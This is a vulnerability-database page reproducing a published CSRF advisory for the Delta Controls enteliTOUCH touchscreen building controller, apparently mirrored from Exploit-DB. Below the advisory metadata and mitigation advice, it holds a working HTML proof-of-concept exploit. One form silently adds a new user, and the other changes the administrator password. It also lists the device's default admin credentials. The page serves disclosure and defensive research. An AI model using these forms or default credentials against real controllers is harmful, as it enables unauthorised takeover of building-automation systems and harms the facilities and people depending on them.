Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)

vendor:

enteliTOUCH

by:

LiquidWorm

5.5

CVSS

MEDIUM

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: enteliTOUCH

Affected Version From: 3.33.4005

Affected Version To: 3.40.3935

Patch Exists: NO

Related CWE:

CPE: a:delta_controls:entelitouch:3.40.3935

Metasploit:

Other Scripts:

Platforms Tested: DELTA enteliTOUCH

2022

Delta Controls enteliTOUCH 3.40.3935 – Cross-Site Request Forgery (CSRF)

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Mitigation:

Implement proper CSRF protection mechanisms such as using CSRF tokens and validating the requests with server-side checks.

Source

Exploit-DB raw data:

# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm

<!DOCTYPE html>
<html>
<head><title>enteliTouch CSRF</title></head>
<body>
<!--

Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)


Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
                  3.40.3706
                  3.33.4005

Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

Tested on: DELTA enteliTOUCH


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5702
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php


06.04.2022

-->


CSRF Add User:

<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
  <input type="hidden" name="actionName" value="" />
  <input type="hidden" name="Username" value="zsl" />
  <input type="hidden" name="Password" value="123t00t" />
  <input type="hidden" name="AutoLogout" value="17" />
  <input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" />
  <input type="hidden" name="ObjRef" value="" />
  <input type="hidden" name="Apply" value="true" />
  <input type="hidden" name="formAction" value="Add" />
  <input type="submit" value="Go for UserAdd" />
</form>

<br />

CSRF Change Admin Password (default: delta:login):

<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
  <input type="hidden" name="actionName" value="" />
  <input type="hidden" name="Username" value="DELTA" />
  <input type="hidden" name="Password" value="123456" />
  <input type="hidden" name="AutoLogout" value="30" />
  <input type="hidden" name="SS&#95;SelectedOptionId" value="" />
  <input type="hidden" name="ObjRef" value="ZSL-251" />
  <input type="hidden" name="Apply" value="true" />
  <input type="hidden" name="formAction" value="Edit" />
  <input type="submit" value="Go for UserEdit" />
</form>

</body>
</html>